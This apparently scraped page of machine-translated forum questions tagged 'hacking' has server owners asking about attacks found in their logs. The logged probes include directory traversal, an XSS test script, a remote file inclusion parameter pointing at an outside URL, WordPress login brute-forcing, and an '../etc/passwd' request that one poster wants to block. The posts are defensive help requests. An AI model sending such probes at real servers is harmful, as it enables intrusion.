标签: hacking

好的，所以我离开了我的 Node.js 服务器一段时间，然后回来在日志中找到了一些非常有趣的东西。显然，来自中国或波兰的一些白痴试图使用目录遍历来入侵我的服务器，但似乎没有成功，但我无法理解日志中的几个条目。这是“hohup.out”文件的输出。

攻击开始了，显然他正试图在我的服务器中找到一些控制台条目。所有这些都失败并返回 404。

[90mGET /../../../../../../../../../../../ [31m500 [90m6ms - 2b[0m
[90mGET /<script>alert(53416)</script> [33m404 [90m7ms[0m
[90mGET / [32m200 [90m2ms - 240b[0m
[90mGET / [32m200 [90m1ms - 240b[0m
[90mGET / [32m200 [90m2ms - 240b[0m
[90mGET /pz3yvy3lyzgja41w2sp [33m404 [90m1ms[0m
[90mGET /stylesheets/style.css [33m404 [90m0ms[0m
[90mGET /index.html [33m404 [90m1ms[0m
[90mGET /index.htm [33m404 [90m0ms[0m
[90mGET /default.html [33m404 [90m0ms[0m
[90mGET /default.htm [33m404 [90m1ms[0m
[90mGET /default.asp [33m404 [90m1ms[0m
[90mGET /index.php [33m404 [90m0ms[0m
[90mGET /default.php [33m404 [90m1ms[0m
[90mGET /index.asp [33m404 [90m0ms[0m
[90mGET /index.cgi [33m404 [90m0ms[0m
[90mGET /index.jsp [33m404 …

我的 postmaster@mydomain.com 刚刚收到以下“未送达邮件”

这是否意味着有人可能试图（或成功）入侵我？

（出于隐私目的，我替换了下面的某些部分，这不是我在这里收到的 100% 原件。）

This is the mail system at host mydomain.com.

I'm sorry to have to inform you that your message could not
be delivered to one or more recipients. It's attached below.

For further assistance, please send mail to <postmaster>

If you do so, please include this problem report. You can
delete your own text from the attached returned message.

                   The mail system

<ubahreasons@yahoo.com>: host mta7.am0.yahoodns.net[98.138.112.35] said: 554
    delivery error: dd Sorry your message to …

从今天早上开始，我目睹了一系列连续的 POST 请求击中了我服务器上运行在 wordpress 软件上的一个博客。

关于这个模式的一些事情：

1. 这些连续的请求每次持续 2 分钟
2. 在这 2 分钟的时间内，wp-login.php 每秒有 4 个 POST 请求命中
3. 然后这些请求静默，1 小时后再次开始，再次持续 2 分钟，每秒 4 个请求。
4. 每次IP地址都不一样
5. 追踪到的所有IP都属于中国
6. 尝试阻止 IP，但他们很容易躲避，因为他们每小时都会收到新 IP

我正在使用 nginx，有什么方法可以阻止此类黑客攻击。这是一个更大的问题，因为当这些请求多次出现时，运行在同一服务器上的其他网站会受到阻碍。如果有人可以提供有关如何保护您的服务器免受此类尝试的任何指示，我们非常欢迎。

请在下面找到，摘自日志。

xx.153.217.xxx - - [12/Jan/2015:13:45:13 +0530] "POST /wp-login.php HTTP/1.1" 200 3662 "http://blog.xxxxxx.in/wp-login.php" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
xx.153.217.xxx - - [12/Jan/2015:13:45:13 +0530] "POST /wp-login.php HTTP/1.1" 200 3662 "http://blog.xxxxxx.in/wp-login.php" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR …

一天前我的网站被关闭 - 收到来自主机的消息，说他们收到了美国银行的投诉，称我的网站被用于网络钓鱼客户。我设法使我的网站上线，并在网站上发现了许多我没有放在那里的奇怪代码片段和文件。它们肯定是由黑客放置的，但现在我很害怕黑客是如何进入我的网站并将他的文件放在那里的。

我能做些什么来防止类似的事情再次发生！？！？！？

最近，我发现很多像这样的奇怪请求出现在我的 Rails 应用程序中：

Processing ApplicationController#index (for 189.30.242.61 at 2009-12-14 07:38:24) [GET]
  Parameters: {"_SERVER"=>{"DOCUMENT_ROOT"=>"http://www.usher.co.kr/bbs/id1.txt???"}}

ActionController::RoutingError (No route matches "/browse/brand/nike  ///" with {:method=>:get}):

看起来它是自动化的，因为我收到了很多并注意到他们试图发送的奇怪参数：

_SERVER"=>{"DOCUMENT_ROOT"=>"http://www.usher.co.kr/bbs/id1.txt???

这是恶意的吗？如果是，我该怎么办？

我的计算机正在向任意目的地发送 ICMP 数据包。我无法理解原因。数据包之一的转储是：

Internet Control Message Protocol
    Type: 3 (Destination unreachable)
    Code: 3 (Port unreachable)
    Checksum: 0x811b [correct]
    Internet Protocol, Src: 80.167.113.76 (80.167.113.76), Dst: 192.168.1.2 (192.168.1.2)
        Version: 4
        Header length: 20 bytes
        Differentiated Services Field: 0x00 (DSCP 0x00: Default; ECN: 0x00)
            0000 00.. = Differentiated Services Codepoint: Default (0x00)
            .... ..0. = ECN-Capable Transport (ECT): 0
            .... ...0 = ECN-CE: 0
        Total Length: 131
        Identification: 0x0631 (1585)
        Flags: 0x00
            0... .... = Reserved bit: Not set
            .0.. .... = Don't …

如果我插入的网络没有 DHCP，也没有可访问的“示例”主机，我可以在其中查看配置。如何发现/猜测网络 IP 范围、网络掩码？网关IP地址？

PS 不要建议使用各种流行的网络掩码对 192.168.*.* 进行暴力破解:))

目前我正在使用 Blockhosts 和 mod_evasive 来“管理”轻微攻击和虚假请求，我想知道是否有更好/更有效的方法。行为类似于 mod_evasive 的东西，在请求进来时监控它们，但有能力控制使用关键字或正则表达式阻止的内容。

例如，任何时候有人请求诸如“../etc/passwd”之类的东西——我都想放弃该 IP 地址几天。我也看过fail2ban，但它和blockhosts 做同样的事情，监控日志文件。不正是我正在寻找的。

无论如何，服务器是运行 Apache 2.2 的 CentOS，在并行虚拟主机容器中并托管大约 100 个站点，所以我只能通过 Web 访问虚拟机主机服务器防火墙并尝试在每个域的 htaccess 中插入重写规则将无法维护.

有什么建议？

几周以来，我托管的网站在请求它们时被网络托管停放页面劫持。

有时它会显示我的实际网站，但在请求它几分钟后，当我重新访问我的网站时，它会显示一个停车页面（来自parkingcrew.net）。

我和我的主人检查了我的域名服务器和 DNS 设置，并确保它们都设置正确。我还检查了我的 .htaccess 文件，就我的网站而言，我检查了我的 php 页面，但我似乎找不到它们有什么问题。我还检查了不同的网络（位置）以确保这不是我的家庭网络的问题。

也许有人可以帮我检查一下，看看是什么问题，或者以前有过这个问题。

其中两个网站是：http : //serifd.nl和http://turnbroekjemetnaam.nl。他们（应该）运行的 IP 地址是 91.220.37.56。

可能重复：
我的服务器被黑了 紧急情况

有一个文件会一直感染此代码。我不明白为什么。所以我想记录谁上传或更改文件。有没有办法记录谁上传或更改了特定文件？

PS：没有FTP登录。我们只使用 SSH 和 Plesk。